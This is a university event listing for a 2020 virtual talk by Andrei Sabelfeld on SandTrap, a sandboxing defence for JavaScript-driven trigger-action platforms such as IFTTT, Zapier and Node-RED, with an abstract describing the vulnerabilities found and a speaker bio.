Skip to main content

Virtual Talk: SandTrap: Securing JavaScript-driven Trigger-Action Platforms

Andrei Sabelfeld: Professor, Department of Computer Science and Engineering at Chalmers University of Technology in Gothenburg, Sweden

Event Details

Date
Friday, November 13, 2020
Time
4-5 p.m.
Description

Abstract: Trigger-Action Platforms (TAPs) play a vital role in fulfilling the promise of the Internet of Things (IoT) by seamlessly connecting otherwise unconnected devices and services. While enabling novel and exciting applications across a variety of services, TAPs raise critical security and privacy concerns because a TAP is effectively a person-in-the-middle between trigger and action services. Third-party code, routinely deployed as "apps" on TAPs, further exacerbates these concerns.

This talk focuses on JavaScript-driven TAPs. We show that the popular IFTTT and Zapier platforms and an open-source alternative, Node-RED, are all susceptible to attacks, ranging from massively exfiltrating data from unsuspecting users to taking over the entire platform. We report on the changes made by IFTTT and Zapier in response to our findings and present an empirical study to assess the implications for Node-RED.

Motivated by the need for a secure yet flexible way to integrate third-party JavaScript apps, we propose SandTrap, a sandboxing approach that allows for isolating apps while letting them communicate via clearly defined interfaces. We present a formalization for a core language that soundly and transparently enforces fine-grained allowlist policies at module-, API-, value-, and context-level. We develop a novel proxy-based JavaScript monitor that enables us to instantiate SandTrap to Node-RED and encompasses a powerful policy generation mechanism. We evaluate the security and performance of the implementation on Node-RED apps.

Bio: Andrei Sabelfeld is a Professor in the Department of Computer Science and Engineering at Chalmers University of Technology in Gothenburg, Sweden. Before joining Chalmers as faculty, he was a Research Associate at Cornell University in Ithaca, NY, USA. Andrei Sabelfeld's research ranges from foundations to practice in a range of topics in computer security and privacy. Today, he leads a group of researchers at Chalmers engaged in a number of internationally visible projects on software security, web security, IoT security, and applied cryptography.

 

**Contact host for Zoom link: Earlence Fernandes (earlence@cs.wisc.edu)

Cost
Free

Tags